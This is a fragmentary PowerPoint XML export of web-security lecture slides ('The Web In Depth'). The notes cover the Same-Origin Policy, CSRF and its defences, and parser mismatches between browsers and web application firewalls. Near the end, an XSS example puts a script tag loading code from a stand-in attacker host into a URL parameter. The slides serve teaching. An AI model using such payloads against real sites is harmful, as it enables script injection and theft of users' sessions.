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381187" y="685800"/>
            <a:ext cx="6096300" cy="3429000"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 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week we’re going to be talking about the basic concepts of the web and how they affect security, then talk about CSRF attacks.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Just a couple examples.  By no means all-encompassing, and we’ll talk a *lot* more about that in the XSS session.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We’ll talk about the implications of separate domains in a moment.  Same-Origin Policy.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the glue that holds browser security together today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Shape 3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36" name="Shape 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You’ll see some examples of this in your coursework, as there are interesting sides here that no one has really looked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Note: You will see sites using referer checks.  This never works, even if it does raise the bar for exploitation *slightly*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Spoiler: Applications change state with GET all the time.  You’ll hit this with an automated scanner one day.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Also, logout functionality almost never has CSRF tokens despite that there can be a user announce there.  Why?  If login state gets messed up, you want the user to still be able to log out.  CSRF tokens can mess that up.  I never cite it on bug reports.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I’ve seen this in at least 3 cases I can remember.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by no means a comprehensive list.  These are just some essentials you should know.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175" y="685800"/>
            <a:ext cx="6096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Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="0" y="3093535"/>
            <a:ext cx="8458200" cy="7122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0" name="Shape 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1300757"/>
            <a:ext cx="7772400" cy="16842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1pPr>
            <a:lvl2pPr lvl="1"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2pPr>
            <a:lvl3pPr lvl="2"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3pPr>
            <a:lvl4pPr lvl="3"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4pPr>
            <a:lvl5pPr lvl="4"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5pPr>
            <a:lvl6pPr lvl="5"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6pPr>
            <a:lvl7pPr lvl="6"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7pPr>
            <a:lvl8pPr lvl="7"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8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="7200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="7200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3093357"/>
            <a:ext cx="7772400" cy="7122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1pPr>
            <a:lvl2pPr lvl="1"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2pPr>
            <a:lvl3pPr lvl="2"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3pPr>
            <a:lvl4pPr lvl="3"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4pPr>
            <a:lvl5pPr lvl="4"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5pPr>
            <a:lvl6pPr lvl="5"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6pPr>
            <a:lvl7pPr lvl="6"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7pPr>
            <a:lvl8pPr lvl="7"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8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="30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2" name="Shape 12"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 13"/>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4" name="Shape 14"/>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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 15"/>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6" name="Shape 16"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 17"/>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8" name="Shape 18"/>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
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="146049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0" name="Shape 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4656667" y="1461909"/>
            <a:ext cx="4030200" cy="3465300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425"/>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1" name="Shape 21"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="205977"/>
            <a:ext cx="8686800" cy="11658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3" name="Shape 23"/>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SzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" sz="4800">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4" name="Shape 24"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4406309"/>
            <a:ext cx="8686800" cy="5196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26" name="Shape 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4406309"/>
            <a:ext cx="8229600" cy="519600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="1" i="0" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="1" i="0" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-381000" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="1" i="0" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-381000" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="1" i="0" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-381000" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="1" i="0" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-381000" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="1" i="0" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-381000" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="1" i="0" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-381000" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="1" i="0" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-381000" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="1" i="0" sz="24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1141500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0"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1pPr>
            <a:lvl2pPr lvl="1"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2pPr>
            <a:lvl3pPr lvl="2"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3pPr>
            <a:lvl4pPr lvl="3"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4pPr>
            <a:lvl5pPr lvl="4"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5pPr>
            <a:lvl6pPr lvl="5"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6pPr>
            <a:lvl7pPr lvl="6"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7pPr>
            <a:lvl8pPr lvl="7"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8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1460499"/>
            <a:ext cx="8229600" cy="3465300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-381000" lvl="1" marL="9144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81000" lvl="2" marL="1371600" rtl="0" algn="l">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42900" lvl="3" marL="1828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6pPr>
            <a:lvl7pPr indent="-342900" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-342900" lvl="7" marL="36576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8pPr>
            <a:lvl9pPr indent="-342900" lvl="8" marL="4114800" rtl="0" algn="l">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Shape 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3093357"/>
            <a:ext cx="7772400" cy="7122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b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Web In Depth</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Shape 33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="33207" l="25065" r="20563" t="36483"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="376800" y="2068250"/>
            <a:ext cx="4667250" cy="1094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HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2800"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t> be parsed according to the relevant spec, generally HTML5 now.</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>But when you’re talking about security, it’s often not just parsed by your browser, but also Web-Application Firewalls and other filters.</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>Wherever there’s a discrepancy in how these two items parse things, there’s probably a vuln.</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 8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Parsing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Canonical Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Shape 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1460500"/>
            <a:ext cx="8229600" cy="13362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000"/>
              <a:t>You go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Droid Sans"/>
                <a:ea typeface="Droid Sans"/>
                <a:cs typeface="Droid Sans"/>
                <a:sym typeface="Droid Sans"/>
              </a:rPr>
              <a:t>http://example.com/vulnerable?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Droid Sans"/>
              <a:ea typeface="Droid Sans"/>
              <a:cs typeface="Droid Sans"/>
              <a:sym typeface="Droid Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Droid Sans"/>
                <a:ea typeface="Droid Sans"/>
                <a:cs typeface="Droid Sans"/>
                <a:sym typeface="Droid Sans"/>
              </a:rPr>
              <a:t>name=&lt;script/xss%20src=http://evilsite.com/my.js&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t> and it generates:</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
